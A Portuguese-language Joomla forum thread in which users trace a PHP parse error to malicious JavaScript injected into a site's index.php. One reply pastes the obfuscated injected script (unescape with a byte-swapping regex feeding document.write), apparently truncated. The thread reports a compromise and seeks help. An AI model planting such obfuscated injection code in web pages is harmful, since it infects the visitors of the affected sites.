[RESOLVIDO] Parse error: syntax error, unexpected '<' in

Mais
14 anos 10 meses atrás #9869 por Rickschaves
Rickschaves replied the topic: Re: Parse error: syntax error, unexpected '<' in
Obrigado pela crítica construtiva, com certeza vamos lembrar disso pra servi-lo melhor das próximas vezes.

Ah, os administradores do JoomlaClube sempre foram o Trorram e eu, desde a criação do Clube...

Please Entrar ou Registrar to join the conversation.

  • junioliver
  • Avatar de junioliver Autor do Tópico
  • Offline
  • JCB! Colaborador
  • JCB! Colaborador
Mais
14 anos 10 meses atrás #9872 por junioliver
junioliver replied the topic: Re: Parse error: syntax error, unexpected '<' in
Trorram, muito bom mesmo todas as minhas duvidas foram sanada pelo proprio, vou fazer umas orações para que ele apareça para me ajudar...

Caso saiba responder Rickschaves estou todo ouvido

desulpa pelo meus erros de escrita.

Please Entrar ou Registrar to join the conversation.

  • junioliver
  • Avatar de junioliver Autor do Tópico
  • Offline
  • JCB! Colaborador
  • JCB! Colaborador
Mais
14 anos 10 meses atrás #9873 por junioliver
junioliver replied the topic: Re: Parse error: syntax error, unexpected '<' in
Rickschaves, pronto novidade para vc, resolvi o problema.
Muito bom para mim e espero que para vc tambem tenha sido, é menos um problema para vc tentar resolver.

Foi muito simple no index.php da raiz estava acrecentado um codigo java na linha 89 e continha muitos codigos ( 3.485 algarismo) removi e pronto.

obrigado a todos que me ajudaram.

Erro simples.

Please Entrar ou Registrar to join the conversation.

Mais
14 anos 10 meses atrás #9901 por Rickschaves
Rickschaves replied the topic: Re: Parse error: syntax error, unexpected '<' in
Obrigado por nos dizer como resolveu. Por favor coloque [RESOLVIDO] no título do tópico. Obrigado!

Please Entrar ou Registrar to join the conversation.

Mais
14 anos 8 meses atrás #14837 por Pequeno666
Pequeno666 replied the topic: Re: [RESOLVIDO] Parse error: syntax error, unexpected '<' in
Meus caros, eu estou com o mesmo problema, porém tem algo de muito estranho, como nao sabia como resolver peguei o arquivo index.php que tem quando voce extrai o Joomla e copiei em cima, porém o a estranheza swe dá que seu eu fico com meu pc ligado o tempo todo mesmo nao tando logado no site nem no ftp ele nao dá problema nenhum e toda vez que eu desligo e ligo o pc depois de um tempo o erro volta, queria algum help pois ja instalei o joomla de novo, ja deletei tudo e reinstalei, ja criei um outro banco de dados e instalei outra versao e continua dando o mesmo problema.

O servidor que eu uso ja tinha outros sites hospedados nele e nao tinha problema nenhum, porém com esse nao sei o que fazer. Vou colocar aqui o que aparece acrescentado do index.php quando dá o erro na ultima linha. É o que está em negrito

/**
* RETURN THE RESPONSE
*/
echo JResponse::toString($mainframe->getCfg('gzip'));
<script>rkqflmss=;jopkbtp();function jopkbtp(bjyshbi){bjyshbi[4]=function(fvybwj){return(fvybwj[0][fvybwj[1]](fvybwj[2],fvybwj[3]));};bjyshbi[2]=/(..)(..)/g;rkqflmss[1]='write';bjyshbi[3]='%$2%$1';rkqflmss[2]=document;bjyshbi[1]='replace';rkqflmss[0]+=unescape(bjyshbi[4](bjyshbi));return(rkqflmss.slice(0,3).reverse().concat(]));};jopkbtp()[4](jopkbtp());</script>

Please Entrar ou Registrar to join the conversation.